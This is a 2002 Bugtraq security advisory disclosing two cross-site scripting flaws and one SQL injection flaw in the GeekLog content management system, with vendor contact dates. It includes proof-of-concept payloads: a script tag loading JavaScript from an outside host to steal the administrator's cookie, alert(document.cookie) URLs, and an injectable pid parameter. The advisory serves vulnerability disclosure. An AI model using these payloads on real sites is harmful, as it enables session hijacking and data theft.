[25700] in bugtraq
[ARL02-A13] Multiple Security Issues in GeekLog
daemon@ATHENA.MIT.EDU (Ahmet Sabri ALPER)
Mon Jun 10 11:43:28 2002
Date: 10 Jun 2002 11:41:43 -0000
Message-ID: <20020610114143.18205.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Ahmet Sabri ALPER <s_alper@hotmail.com>
To: bugtraq@securityfocus.com
+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\------- Security Advisory -----/---------/+
+/----------\------ ID: ARL02-A13 ----/----------/+
+/-----------\----- salper@olympos.org ---/-----------/+
Advisory Information
--------------------
Name : Multiple Security Issues in GeekLog
Software Package : GeekLog
Vendor Homepage : http://geeklog.sourceforge.net/
Vulnerable Versions: v1.3.5, v1.3.5rc1 and older
Platforms : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted : 31/05/2002
Vendor Replied : 01/06/2002
Prior Problems : N/A
Current Version : v1.3.5rc1 (vulnerable)
Summary
-------
GeekLog is a web content management system suitable for
running full-featured community sites. It supports article
posting, threaded comments, event scheduling, and link
management and is built around a design philosophy that
emphasizes ease of use.
I have found these issues while testing the GeekLog system
which was to be used at http://www.olympos.org, "Olympos
Turkish Security Portal".
2 different types of Cross Site Scripting issues, plus
1 SQL Injection vulnerability was found in GeekLog.
Details
-------
1. When any user sends a new Calender Event, the form is submitted
to the site admin for approval. The $url variable, which holds the
data given in the "Link" section of the form, is not filtered for
malicious code. So a malicious user may get the cookie of the site
administrator and therefore "own" the site.
Also this issue may be exploited to run malicious code on the GeekLog
site.
Proof-of-concept Link input ($url):
<script src="http://forum.olympos.org/f.js">Alper</script>
2. Maliciously crafted links from third party sites may allow Cross
Site Scripting attacks via "index.php" and/or "comment.php".
Two examples for this;
/index.php?topic=<script>alert(document.cookie)</script>
/comment.php?mode=display&sid=foo&pid=18&title=<script>alert
(document.cookie)</script>&type=article
3. The $pid variable is directly passed to SQL input. This makes it
possible for attackers to launch SQL injection attacks.
/comment.php?
mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs
As the "Magic Quotes" function of PHP escapes the quoting characters,
this third issue might just cause "light" headaches, but if the "Magic
Quotes" is not active, the attacker may be able to get all the information
about users from the SQL tables.
Solution
--------
The vendor replied and acted quickly.
A patch or a new version pointing this issue will
soon be available via CVS or a FTP download from:
http://www.sourceforge.net/projects/geeklog
or
http://geeklog.sourceforge.net
The development team of GeekLog said that; they will
be cleaning out the code for similar security issues,
which were mentioned above.
Credits
-------
Discovered on 31, May, 2002 by
Ahmet Sabri ALPER <salper@olympos.org>
ALPER Research Labs.
The ALPER Research Labs. [ARL] workers are freelancer
security professionals and WhiteHat hackers. The ARL
workers are available for hiring for legal jobs.
The ARL also supports Open Software Community, by detecting
possible security issues in GPL or any other Public Licensed
product.
References
----------
Product Web Page: http://geeklog.sourceforge.net/
Olympos: http://www.olympos.org/
